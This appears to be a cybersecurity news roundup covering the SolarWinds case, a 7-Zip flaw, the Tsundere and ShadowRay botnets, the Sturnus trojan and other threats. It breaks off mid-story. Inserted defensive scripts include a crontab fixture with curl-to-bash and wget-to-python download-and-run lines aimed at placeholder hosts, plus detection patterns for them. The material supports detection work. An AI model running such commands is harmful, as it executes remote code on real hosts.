Category: Cybersecurity

  • SEC Drops SolarWinds Case After Years of High-Stakes Cybersecurity Scrutiny

    Nov 21, 2025 | Ravie Lakshmanan | Compliance / Cyber Attack

    The U.S. Securities and Exchange Commission (SEC) has abandoned its lawsuit against SolarWinds and its chief information security officer, which alleged that the company had misled investors about the security practices that led to the 2020 supply chain attack.

    In a joint motion filed November 20, 2025, the SEC, along with SolarWinds and its CISO Timothy G. Brown, asked the court to voluntarily dismiss the case.

    The SEC said its decision to seek dismissal “does not necessarily reflect the Commission’s position on any other case.”

    In October 2023 the SEC accused SolarWinds and Brown of “fraud and internal control failures,” alleging that the company defrauded investors by overstating its cybersecurity practices and understating or failing to disclose known risks.

    The agency also said both SolarWinds and Brown ignored “repeated red flags” and failed to adequately protect its assets, ultimately leading to the supply chain compromise that came to light in late 2020. The attack was attributed to a Russian state-sponsored threat actor known as APT29.

    “Brown was aware of SolarWinds’ cybersecurity risks and vulnerabilities but failed to resolve the issues or, at times, sufficiently raise them further within the company,” the SEC alleged at the time.

    However, in July 2024, many of these allegations were thrown out by the U.S. District Court for the Southern District of New York (SDNY), which stated that “these do not plausibly plead actionable deficiencies in the company’s reporting of the cybersecurity hack” and that they “impermissibly rely on hindsight and speculation.”

    Subsequently, the SEC also charged Avaya, Check Point, Mimecast, and Unisys for making “materially misleading disclosures” related to the large-scale cyber attack that stemmed from the SolarWinds hack.

    In a statement, SolarWinds CEO Sudhakar Ramakrishna said the latest development marks the end of an era that challenged the company, and emphasized “we emerge stronger, more secure, and better prepared than ever for what lies ahead.”


    Source: thehackernews.com…

  • NHS Warns of PoC Exploit for 7-Zip Symbolic Link–Based RCE Vulnerability

    Nov 19, 2025 | Ravie Lakshmanan | Vulnerability / Threat Intelligence


    Update:
    NHS England Digital, in an updated advisory on November 20, 2025, said it has not observed in-the-wild exploitation of CVE-2025-11001, but noted that it’s “aware of a public proof-of-concept exploit.” It has since removed what it said were “erroneous references” to active exploitation.

    The original story follows below –

    A recently disclosed security flaw impacting 7-Zip has come under active exploitation in the wild, according to an advisory issued by the U.K. NHS England Digital on Tuesday.

    The vulnerability in question is CVE-2025-11001 (CVSS score: 7.0), which allows remote attackers to execute arbitrary code. It has been addressed in 7-Zip version 25.00 released in July 2025.

    “The specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories,” Trend Micro’s Zero Day Initiative (ZDI) said in an alert released last month. “An attacker can leverage this vulnerability to execute code in the context of a service account.”

    Ryota Shiga of GMO Flatt Security Inc., along with the company’s artificial intelligence (AI)-powered AppSec Auditor Takumi, has been credited with discovering and reporting the vulnerability.

    It’s worth noting that 7-Zip 25.00 also resolves another flaw, CVE-2025-11002 (CVSS score: 7.0), that allows for remote code execution by taking advantage of improper handling of symbolic links within ZIP archives, resulting in directory traversal. Both shortcomings were introduced in version 21.02.
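    As an added example (not code from 7-Zip, ZDI, or the researchers credited above), the following Python script shows how a defender can inspect a ZIP archive before extraction for the class of problem described here: symbolic-link entries whose target points outside the extraction root, and later entries whose path passes through such a link, which is how a crafted archive redirects a file write to an unintended directory. The sample archive is constructed in memory for the demonstration; the `audit_zip` and `build_sample_archive` names and the heuristics are this example's own, not 7-Zip's logic.

```python
import io
import posixpath
import re
import stat
import zipfile


def escapes_root(path: str) -> bool:
    """True if a path is absolute, carries a drive letter, or climbs above the
    extraction root after normalisation (e.g. "../../etc/passwd")."""
    unix_style = path.replace("\\", "/")
    if unix_style.startswith("/") or re.match(r"^[A-Za-z]:", unix_style):
        return True
    norm = posixpath.normpath(unix_style)
    return norm == ".." or norm.startswith("../")


def is_symlink(info: zipfile.ZipInfo) -> bool:
    # ZIP stores the Unix mode bits in the high 16 bits of external_attr.
    return stat.S_ISLNK(info.external_attr >> 16)


def audit_zip(data: bytes) -> list[tuple[str, str]]:
    """Return (entry_name, reason) pairs for entries that should block extraction.

    Two patterns are flagged: a symlink whose target leaves the extraction
    root, and any entry whose path passes through an earlier symlink entry.
    """
    findings = []
    symlink_dirs = []  # names of symlink entries seen so far, as path prefixes
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if escapes_root(name):
                findings.append((name, "entry path escapes the extraction root"))
            if is_symlink(info):
                # For a symlink entry the stored data is the link target.
                target = zf.read(info).decode("utf-8", "replace")
                if escapes_root(target):
                    findings.append((name, f"symlink target escapes the extraction root: {target}"))
                symlink_dirs.append(name.rstrip("/") + "/")
                continue
            for prefix in symlink_dirs:
                if name.startswith(prefix):
                    findings.append((name, f"path passes through symlink entry {prefix.rstrip('/')}"))
                    break
    return findings


def build_sample_archive(malicious: bool = True) -> bytes:
    """Constructed test archive for the demonstration (not a real exploit sample).

    With malicious=True it holds a benign file, a symlink entry pointing above
    the extraction root, and a file whose path goes through that link.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "hello")
        if malicious:
            link = zipfile.ZipInfo("docs/link")
            link.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(link, "../../outside")
            zf.writestr("docs/link/note.txt", "written through the link")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, reason in audit_zip(build_sample_archive()):
        print(f"BLOCK {entry}: {reason}")
```

    Run the script on its own and it reports the symlink entry and the file routed through it; running `audit_zip` over archives at an ingestion point (mail gateway, upload handler) gives a pre-extraction gate that does not depend on which extractor, or which version of it, is installed downstream.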

    “Active exploitation of CVE-2025-11001 has been observed in the wild,” NHS England Digital said. However, there are currently no details available on how it’s being weaponized, by whom, and in what context.

    Given that proof-of-concept (PoC) exploits exist, 7-Zip users who have not already updated should apply the fix promptly.

    “This vulnerability can only be exploited from the context of an elevated user / service account or a machine with developer mode enabled,” security researcher Dominik (aka pacbypass), who released the PoC, said in a post detailing the flaw. “This vulnerability can only be exploited on Windows.”

    (The story was updated after publication to note that the vulnerability is not under active exploitation as previously mentioned.)


    Source: thehackernews.com…

  • Salesforce Flags Unauthorized Data Access via Gainsight-Linked OAuth Activity

    Nov 21, 2025 | Ravie Lakshmanan | Data Breach / SaaS Security

    Salesforce has warned of detected “unusual activity” related to Gainsight-published applications connected to the platform.

    “Our investigation indicates this activity may have enabled unauthorized access to certain customers’ Salesforce data through the app’s connection,” the company said in an advisory.

    The cloud services firm said it has taken the step of revoking all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce. It has also temporarily removed those applications from the AppExchange as its investigation continues.

    Salesforce did not disclose how many customers were impacted by the incident, but said it has notified them.

    “There is no indication that this issue resulted from any vulnerability in the Salesforce platform,” the company added. “The activity appears to be related to the app’s external connection to Salesforce.”

    Out of an abundance of caution, the Gainsight app has been temporarily pulled from the HubSpot Marketplace. “This may also impact OAuth access for customer connections while the review is taking place,” Gainsight said. “No suspicious activity related to HubSpot has been observed at this point.”

    In a post shared on LinkedIn, Austin Larsen, principal threat analyst at Google Threat Intelligence Group (GTIG), described it as an “emerging campaign” targeting Gainsight-published applications connected to Salesforce.

    The activity is assessed to be tied to threat actors associated with the ShinyHunters (aka UNC6240) group, mirroring a similar set of attacks targeting Salesloft Drift instances earlier this August.

    According to DataBreaches.Net, ShinyHunters has confirmed the campaign is their doing and stated that the Salesloft and Gainsight attack waves allowed them to steal data from nearly 1000 organizations.

    Interestingly, Gainsight previously said it was also one of the Salesloft Drift customers impacted in the previous attack. But it’s not clear at this stage if the earlier breach played a role in the current incident.

    In that hack, the attackers accessed business contact details for Salesforce-related content, including names, business email addresses, phone numbers, regional/location details, product licensing information, and support case contents (without attachments).

    “Adversaries are increasingly targeting the OAuth tokens of trusted third-party SaaS integrations,” Larsen pointed out.

    In light of the malicious activity, organizations are advised to review all third-party applications connected to Salesforce, revoke tokens for unused or suspicious applications, and rotate credentials if anomalies are flagged from an integration.


    Source: thehackernews.com…

  • Tsundere Botnet Expands Using Game Lures and Ethereum-Based C2 on Windows

    Nov 20, 2025 | Ravie Lakshmanan | Botnet / Malware

    Cybersecurity researchers have warned of an actively expanding botnet dubbed Tsundere that’s targeting Windows users.

    Active since mid-2025, the threat is designed to execute arbitrary JavaScript code retrieved from a command-and-control (C2) server, Kaspersky researcher Lisandro Ubiedo said in an analysis published today.

    There are currently no details on how the botnet malware is propagated; however, in at least one case, the threat actors behind the operation are said to have leveraged a legitimate Remote Monitoring and Management (RMM) tool as a conduit to download an MSI installer file from a compromised site.

    The names given to the malware artifacts – Valorant, r6x (Rainbow Six Siege X), and cs2 (Counter-Strike 2) – also suggest that the implant is likely being disseminated using lures for games. It’s possible that users searching for pirated versions of these games are the target.

    Regardless of the method used, the fake MSI installer is designed to install Node.js and launch a loader script that’s responsible for decrypting and executing the main botnet-related payload. It also prepares the environment by downloading three legitimate libraries, namely, ws, ethers, and pm2, using an “npm install” command.

    “The pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot,” Ubiedo explained. “Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.”

    Kaspersky’s analysis of the C2 panel has revealed that the malware is also propagated in the form of a PowerShell script, which performs a similar sequence of actions by deploying Node.js on the compromised host and downloading ws and ethers as dependencies.

    While the PowerShell infector doesn’t make use of pm2, it carries out the same actions observed in the MSI installer by creating a registry key value that ensures the bot is executed on each login by spawning a new instance of itself.
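    As an added example, and not code from Kaspersky or from the malware itself, the script below shows one way a defender can triage a `reg export` of the per-user Run key for the kind of login persistence described above: values that launch the Node.js runtime or pm2, or a PowerShell process started hidden or with an encoded command. The registry export is a constructed sample with illustrative paths, and the `audit_run_key` name and its heuristics are this example's own.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# (illustrative paths only, not data from a real infection).
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"NodeService"="\"C:\\Program Files\\nodejs\\node.exe\" \"C:\\Users\\alice\\AppData\\Roaming\\svc\\loader.js\""
"PM2"="\"C:\\Users\\alice\\AppData\\Roaming\\npm\\pm2.cmd\" resurrect"
"Updater"="powershell.exe -WindowStyle Hidden -File \"C:\\Users\\alice\\AppData\\Roaming\\update.ps1\""
'''

VALUE_LINE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"$')
NODE_RUNTIMES = {"node.exe", "node", "pm2", "pm2.cmd", "pm2.exe"}
HIDDEN_PS_FLAGS = ("-windowstyle hidden", "-w hidden", "-enc", "-encodedcommand")


def unescape_reg_string(value: str) -> str:
    """Undo the .reg escaping of backslashes and double quotes."""
    return re.sub(r'\\(["\\])', r"\1", value)


def command_executable(command: str) -> str:
    """Lower-cased basename of the program a Run value launches."""
    command = command.strip()
    if command.startswith('"'):
        exe = command[1:].split('"', 1)[0]
    else:
        exe = command.split(None, 1)[0]
    return PureWindowsPath(exe).name.lower()


def parse_reg_export(text: str):
    """Yield (key, value_name, command) for every string value in the export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            yield key, m["name"], unescape_reg_string(m["value"])


def audit_run_key(text: str) -> list[dict]:
    """Return Run values that match the login-persistence patterns."""
    findings = []
    for key, name, command in parse_reg_export(text):
        if not key.endswith(r"\CurrentVersion\Run"):
            continue
        exe = command_executable(command)
        lowered = command.lower()
        reason = None
        if exe in NODE_RUNTIMES:
            reason = "Node.js runtime or pm2 launched at login"
        elif exe.startswith("powershell") and any(f in lowered for f in HIDDEN_PS_FLAGS):
            reason = "PowerShell launched hidden or with an encoded command at login"
        if reason:
            findings.append({"key": key, "name": name, "command": command, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_run_key(SAMPLE_REG_EXPORT):
        print(f"{f['name']}: {f['reason']} -> {f['command']}")
```

    A legitimate developer workstation can have Node.js or pm2 entries under Run, so treat hits as triage candidates to compare against a known baseline rather than as verdicts; the value of the check is that it surfaces a Node.js interpreter being started at login with a script from a user-writable location, which is the shape both infectors described above leave behind.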

    The Tsundere botnet makes use of the Ethereum blockchain to fetch details of the WebSocket C2 server (e.g., ws://193.24.123[.]68:3011 or ws://185.28.119[.]179:1234), creating a resilient mechanism that allows the attackers to rotate the infrastructure simply by updating a smart contract. The contract was created on September 23, 2024, and has had 26 transactions to date.

    Once the C2 address is retrieved, the bot checks that it is a valid WebSocket URL, establishes a WebSocket connection to that address, and receives JavaScript code sent by the server. Kaspersky said it did not observe any follow-up commands from the server during the observation period.

    “The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions,” Kaspersky said.

    The botnet operations are facilitated by a control panel that allows logged-in users to build new artifacts using MSI or PowerShell, manage administrative functions, view the number of bots at any given point of time, turn their bots into a proxy for routing malicious traffic, and even browse and purchase botnets via a dedicated marketplace.

    Exactly who is behind Tsundere is not known, but the presence of Russian-language strings in the source code, used for logging, points to a Russian-speaking threat actor. The activity is assessed to share functional overlaps with a malicious npm campaign documented by Checkmarx, Phylum, and Socket in November 2024.

    What’s more, the same server has been identified as hosting the C2 panel associated with an information stealer known as 123 Stealer, which is available on a subscription basis for $120 per month. It was first advertised by a threat actor named “koneko” on a dark web forum on June 17, 2025, per Outpost24’s KrakenLabs Team.

    Another clue that points to its Russian origins is that the customers are forbidden from using the stealer to target Russia and the Commonwealth of Independent States (CIS) countries. “Violation of this rule will result in the immediate blocking of your account without explanation,” Koneko said in the post at the time.

    “Infections can occur through MSI and PowerShell files, which provide flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat,” Kaspersky said.


    Source: thehackernews.com…

  • ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet

    Nov 20, 2025 | Ravie Lakshmanan | Vulnerability / Cloud Computing

    Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet.

    The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig.

    The vulnerability has remained unpatched due to a “long-standing design decision” that’s consistent with Ray’s development best practices, which require it to be run in an isolated network and to act only upon trusted code.

    The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to an unauthenticated Ray Job Submission API (“/api/jobs/”) on exposed dashboards. The compromised Ray clusters are then used in spray-and-pray attacks to distribute the payloads to other Ray dashboards, creating a worm that can essentially spread from one victim to another.

    The attacks have been found to leverage GitLab and GitHub to deliver the malware, using names like “ironern440-group” and “thisisforwork440-ops” to create repositories and stash the malicious payloads. Both accounts are no longer accessible. However, the cybercriminals have responded to takedown efforts by creating a new GitHub account, illustrating their tenacity and ability to quickly resume operations.

    The payloads, in turn, leverage the platform’s orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab to re-infect the hosts.
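    As an added example (not Oligo's code and not the campaign's), the following Python script shows how a defender can audit per-user crontab contents on a Ray node for the persistence pattern described above: an entry that re-runs at a short interval and downloads remote content, typically from a code-hosting service, straight into an interpreter. The crontab text is a constructed sample with placeholder URLs and a TEST-NET address; `audit_crontab` and its heuristics are this example's own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of a per-user crontab (five schedule fields + command).
# The URLs and the 203.0.113.5 address are placeholders, not real indicators.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/15 * * * * curl -fsSL https://gitlab.example/placeholder-group/tools/-/raw/main/run.sh | bash
*/5 * * * * /opt/ray/healthcheck.sh
0,30 * * * * wget -qO- http://203.0.113.5/x.py | python3
@reboot /usr/local/bin/start-agent
"""

# curl/wget output piped directly into an interpreter, with or without sudo.
FETCH_PIPE_EXEC = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh|python3?|perl)\b"
)
CODE_HOSTING = re.compile(r"\b(?:gitlab|github|raw\.githubusercontent)\.", re.I)


@dataclass
class CronFinding:
    line: str
    reasons: list[str] = field(default_factory=list)


def minute_interval(minute_field: str):
    """Smallest interval in minutes implied by the minute field, or None when
    the entry fires only at fixed minutes (e.g. "0,30") or on @reboot."""
    if minute_field == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else None


def split_entry(line: str):
    """Return (minute_field, command) for a crontab line, or None if malformed."""
    if line.startswith("@"):
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)
    return (parts[0], parts[5]) if len(parts) == 6 else None


def audit_crontab(text: str) -> list[CronFinding]:
    """Flag entries that fetch and execute remote content; record the interval
    and the use of a code-hosting service as aggravating factors."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        entry = split_entry(line)
        if entry is None:
            continue
        minute, command = entry
        reasons = []
        if FETCH_PIPE_EXEC.search(command):
            reasons.append("downloads and executes remote content in one step")
            if CODE_HOSTING.search(command):
                reasons.append("fetches from a public code-hosting service")
            interval = minute_interval(minute)
            if interval is not None and interval <= 15:
                reasons.append(f"re-runs every {interval} minute(s)")
        if reasons:
            findings.append(CronFinding(line, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"SUSPICIOUS: {f.line}\n  - " + "\n  - ".join(f.reasons))
```

    The check is written for the per-user crontab format; `/etc/crontab` and `/etc/cron.d` files carry an extra user field before the command, so `split_entry` would need to split on six fields there. Because the re-infection described above is driven by the cron entry itself, removing the entry and the fetched script together, on every node the cluster can reach, is what stops the host from being re-infected on the next run.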

    The threat actors “have turned Ray’s legitimate orchestration features into tools for a self-propagating, globally cryptojacking operation, spreading autonomously across exposed Ray clusters,” researchers Avi Lumelsky and Gal Elbaz said.

    The campaign has likely made use of large language models (LLMs) to create the GitLab payloads. This assessment is based on the malware’s “structure, comments, and error handling patterns.”

    The infection chain involves an explicit check to determine if the victim is located in China, and if so, serves a region-specific version of the malware. It’s also designed to eliminate competition by scanning running processes for other cryptocurrency miners and terminating them – a tactic widely adopted by cryptojacking groups to maximize the mining gains from the host.

    Another notable aspect of the attacks is the use of various tactics to fly under the radar, including disguising malicious processes as legitimate Linux kernel worker services and limiting CPU usage to around 60%. It’s believed that the campaign may have been active since September 2024.

    While Ray is meant to be deployed within a “controlled network environment,” the findings show that users are exposing Ray servers to the internet, opening a lucrative attack surface for bad actors, who identify which Ray dashboard IP addresses are exploitable using the open-source vulnerability detection tool interact.sh. More than 230,500 Ray servers are publicly accessible.

    Anyscale, which originally developed Ray, has released a “Ray Open Ports Checker” tool to validate the proper configuration of clusters to prevent accidental exposure. Other mitigation strategies include configuring firewall rules to limit unauthorized access and adding authorization on top of the Ray Dashboard port (8265 by default).

    “Attackers deployed sockstress, a TCP state exhaustion tool, targeting production websites. This suggests the compromised Ray clusters are being weaponized for denial-of-service attacks, possibly against competing mining pools or other infrastructure,” Oligo said.

    “This transforms the operation from pure cryptojacking into a multi-purpose botnet. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition. The target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure.”


    Source: thehackernews.com…

  • ThreatsDay Bulletin: 0-Days, LinkedIn Spies, Crypto Crimes, IoT Flaws and New Malware Waves

    Nov 20, 2025 | Ravie Lakshmanan | Cybersecurity / Hacking News

    This week has been crazy in the world of hacking and online security. From Thailand to London to the US, we’ve seen arrests, spies at work, and big power moves online. Hackers are getting caught. Spies are getting better at their jobs. Even simple things like browser add-ons and smart home gadgets are being used to attack people.

    Every day, there’s a new story that shows how quickly things are changing in the fight over the internet.

    Governments are cracking down harder on cybercriminals. Big tech companies are rushing to fix their security. Researchers keep finding weak spots in apps and devices we use every day. We saw fake job recruiters on LinkedIn spying on people, huge crypto money-laundering cases, and brand-new malware made just to beat Apple’s Mac protections.

    All these stories remind us: the same tech that makes life better can very easily be turned into a weapon.

    Here’s a simple look at the biggest cybersecurity news happening right now — from the hidden parts of the dark web to the main battles between countries online.

    1. Crypto launderer’s luxury spree unravels

      A 45-year-old from Irvine, California, has pleaded guilty to laundering at least $25 million stolen in a massive $230 million cryptocurrency scam. Kunal Mehta (aka “Papa,” “The Accountant,” and “Shrek”) is the eighth defendant to plead guilty for his participation in this scheme following charges brought by the Department of Justice in May 2025. The scheme used social engineering to steal hundreds of millions of dollars in cryptocurrency from victims throughout the U.S. through elaborate ruses committed online and through spoofed phone numbers between around October 2023 and March 2025, according to the U.S. Justice Department. The stolen proceeds were used to purchase luxury goods, rental homes, a team of private security guards, and exotic cars. “Mehta created multiple shell companies in 2024 for the purpose of laundering funds through bank accounts created to give the appearance of legitimacy,” the DoJ said. “To facilitate crypto-to-wire money laundering services, Mehta received stolen cryptocurrency from the group, which they had already laundered. Mehta then transferred the cryptocurrency to associates who further laundered it through sophisticated blockchain laundering techniques. The stolen funds returned to Mehta’s shell company bank accounts through incoming wire transfers from additional shell companies organized by others throughout the United States.” Mehta also personally delivered cash when requested by the members, while also performing wire transfers and facilitating exotic car purchases in exchange for a 10% fee.

    Every week, new online dangers pop up. Real stories show how much our daily lives depend on the internet. The same apps and tools that make life quicker and easier can also let bad guys in.

    It’s not just for experts anymore. Anyone who goes online, clicks links, or shares stuff needs to pay attention.

    Governments try to catch hackers, and experts find secret weak spots. But one thing is always true: keeping our digital world safe never ends. The best thing we can do is learn from what happens, fix our apps and passwords, and watch out for new tricks.

    I’ll keep sharing simple updates and closer looks at the big stories about cyber threats, privacy, and staying safe online.


    Source: thehackernews.com…

  • New Sturnus Android Trojan Quietly Captures Encrypted Chats and Hijacks Devices

    Nov 20, 2025 | Ravie Lakshmanan | Malware / Mobile Security

    Cybersecurity researchers have disclosed details of a new Android banking trojan called Sturnus that enables credential theft and full device takeover to conduct financial fraud.

    “A key differentiator is its ability to bypass encrypted messaging,” ThreatFabric said in a report shared with The Hacker News. “By capturing content directly from the device screen after decryption, Sturnus can monitor communications via WhatsApp, Telegram, and Signal.”

    Another notable feature is its ability to stage overlay attacks by serving fake login screens atop banking apps to capture victims’ credentials. According to the Dutch mobile security company, Sturnus is privately operated and is currently assessed to be in the evaluation stage. Artifacts distributing the banking malware are listed below –

    • Google Chrome (“com.klivkfbky.izaybebnx”)
    • Preemix Box (“com.uvxuthoq.noscjahae”)

    The malware has been designed to specifically single out financial institutions across Southern and Central Europe with region-specific overlays.

    The name Sturnus is a nod to its use of a mixed communication pattern blending plaintext, AES, and RSA, with ThreatFabric likening it to the European starling (binomial name: Sturnus vulgaris), which incorporates a variety of whistles and is known to be a vocal mimic.

    The trojan, once launched, contacts a remote server over WebSocket and HTTP channels to register the device and receive encrypted payloads in return. It also establishes a WebSocket channel to allow the threat actors to interact with the compromised Android device during Virtual Network Computing (VNC) sessions.

    Besides serving fake overlays for banking apps, Sturnus is also capable of abusing Android’s accessibility services to capture keystrokes and record user interface (UI) interactions. As soon as an overlay for a bank is served to the victim and the credentials are harvested, the overlay for that specific target is disabled so as not to arouse the user’s suspicion.

    Furthermore, it can display a full-screen overlay that blocks all visual feedback and mimics the Android operating system update screen to give the impression to the user that software updates are in progress, when, in reality, it allows malicious actions to be carried out in the background.

    Some of the malware’s other features include monitoring device activity, leveraging accessibility services to gather chat contents from Signal, Telegram, and WhatsApp, and sending details about every visible interface element on the screen.

    This allows the attackers to reconstruct the layout at their end and remotely issue actions related to clicks, text input, scrolling, app launches, permission confirmations, and even enable a black screen overlay. An alternate remote control mechanism packed into Sturnus uses the system’s display-capture framework to mirror the device screen in real-time.

    “Whenever the user navigates to settings screens that could disable its administrator status, the malware detects the attempt through accessibility monitoring, identifies relevant controls, and automatically navigates away from the page to interrupt the user,” ThreatFabric said.

    “Until its administrator rights are manually revoked, both ordinary uninstallation and removal through tools like ADB are blocked, giving the malware strong protection against cleanup attempts.”

    The extensive environment monitoring capabilities make it possible to collect sensor information, network conditions, hardware data, and an inventory of installed apps. This device profile serves as a continuous feedback loop, helping attackers adapt their tactics to sidestep detection.

    “Although the spread remains limited at this stage, the combination of targeted geography and high-value application focus implies that the attackers are refining their tooling ahead of broader or more coordinated operations,” ThreatFabric said.


    Source: thehackernews.com…

  • CTM360 Exposes a Global WhatsApp Hijacking Campaign: HackOnChat

    Nov 20, 2025 | The Hacker News | Online Fraud / Web Security

    CTM360 has identified a rapidly expanding WhatsApp account-hacking campaign targeting users worldwide via a network of deceptive authentication portals and impersonation pages. The campaign, internally dubbed HackOnChat, abuses WhatsApp’s familiar web interface, using social engineering tactics to trick users into compromising their accounts.

    Investigators identified thousands of malicious URLs being hosted on inexpensive top-level domains and rapidly generated through modern website-building platforms, allowing attackers to deploy new pages at scale. The campaign’s activity logs show hundreds of incidents in recent weeks, with a noticeable surge across the Middle East and Asia.

    Read the full report here: https://www.ctm360.com/reports/hackonchat-unmasking-the-whatsapp-hacking-scam

    The hacking operations and the exploitation techniques

    Two techniques dominate these hacking operations: session hijacking, where threat actors misuse the linked-device functionality to hijack active WhatsApp Web sessions, and account takeover, which involves deceiving victims into surrendering authentication keys, granting attackers full control of their accounts. Attackers push these links using templates of fake security alerts, WhatsApp Web lookalike portals, and spoofed group-invite messages. These sites are further optimized for global reach, featuring multilingual support and a country-code selector that adapts the interface for users across multiple regions.

    Once scammers gain control of a WhatsApp account, they exploit it to target the victim’s contacts, often requesting money or sensitive information under the guise of a trusted source. They may also sift through messages, media, and documents to steal personal, financial, or private data, which can be used for fraud, impersonation, or extortion. Frequently, these attacks extend further as the compromised account is used to send phishing messages to the victim’s contacts, creating a chain of attacks that spreads the scam.

    HackOnChat demonstrates that social engineering remains one of the most scalable attack vectors today, especially when attackers exploit trusted and familiar interfaces and the human trust built around them.

    Read the full report here and explore all of CTM360’s latest insights and threat intelligence.

    Learn more at www.ctm360.com


    Source: thehackernews.com…

  • Iran-Linked Hackers Mapped Ship AIS Data Days Before Real-World Missile Strike Attempt

    Nov 20, 2025 | Ravie Lakshmanan | Cyber Warfare / Threat Intelligence

    Threat actors with ties to Iran engaged in cyber warfare as part of efforts to facilitate and enhance physical, real-world attacks, a trend that Amazon has called cyber-enabled kinetic targeting.

    The development is a sign that the lines between state-sponsored cyber attacks and kinetic warfare are increasingly blurring, necessitating a new category of warfare, the tech giant’s threat intelligence team said in a report shared with The Hacker News.

    While traditional cybersecurity frameworks have treated digital and physical threats as separate domains, CJ Moses, CISO of Amazon Integrated Security, said these delineations are artificial and that nation-state threat actors are engaging in cyber reconnaissance activity to enable kinetic targeting.

    “These aren’t just cyber attacks that happen to cause physical damage; they are coordinated campaigns where digital operations are specifically designed to support physical military objectives,” Moses added.

    As an example, Amazon said it observed Imperial Kitten (aka Tortoiseshell), a hacking group assessed to be affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), conducting digital reconnaissance between December 2021 and January 2024, targeting a ship’s Automatic Identification System (AIS) platform with the goal of gaining access to critical shipping infrastructure.

    Subsequently, the threat actor was identified as attacking additional maritime vessel platforms, in one case even gaining access to CCTV cameras fitted on a maritime vessel that provided real-time visual intelligence.

    The attack progressed to a targeted intelligence gathering phase on January 27, 2024, when Imperial Kitten carried out targeted searches for AIS location data for a specific shipping vessel. Merely days later, that same vessel was targeted by an unsuccessful missile strike carried out by Iranian-backed Houthi militants.

    A string of missile attacks targeting commercial shipping in the Red Sea has been attributed to Houthi forces, acting in support of the Palestinian militant group Hamas in its war with Israel. On February 1, 2024, the Houthi movement in Yemen claimed it had struck a U.S. merchant ship named KOI with “several appropriate naval missiles.”

    “This case demonstrates how cyber operations can provide adversaries with the precise intelligence needed to conduct targeted physical attacks against maritime infrastructure – a critical component of global commerce and military logistics,” Moses said.

    Another case study concerns MuddyWater, a threat actor linked to Iran’s Ministry of Intelligence and Security (MOIS), which established infrastructure for a cyber network operation in May 2025 and, a month later, used that server to access another compromised server containing live CCTV streams from Jerusalem to gather real-time visual intelligence of potential targets.

    On June 23, 2025, around the time Iran launched widespread missile attacks against the city, the Israel National Cyber Directorate disclosed that “Iranians have been trying to connect to cameras to understand what happened and where their missiles hit to improve their precision.”

    To pull off these multi-layered attacks, the threat actors are said to have routed their traffic through anonymizing VPN services to obscure their true origins and complicate attribution efforts. The findings serve to highlight that espionage-focused attacks can ultimately be a launchpad for kinetic targeting.

    “Nation-state actors are recognizing the force multiplier effect of combining digital reconnaissance with physical attacks,” Amazon said. “This trend represents a fundamental evolution in warfare, where the traditional boundaries between cyber and kinetic operations are dissolving.”


    Source: thehackernews.com…

  • TamperedChef Malware Spreads via Fake Software Installers in Ongoing Global Campaign


    Nov 20, 2025 | Ravie Lakshmanan | Malvertising / Artificial Intelligence


    Threat actors are leveraging bogus installers masquerading as popular software to trick users into installing malware as part of a global malvertising campaign dubbed TamperedChef.

    The end goal of the attacks is to establish persistence and deliver JavaScript malware that facilitates remote access and control, per a new report from Acronis Threat Research Unit (TRU). The campaign, per the Singapore-headquartered company, is still ongoing, with new artifacts being detected and associated infrastructure remaining active.

    “The operator(s) rely on social engineering by using everyday application names, malvertising, Search Engine Optimization (SEO), and abused digital certificates that aim to increase user trust and evade security detection,” researchers Darrel Virtusio and Jozsef Gegeny said.


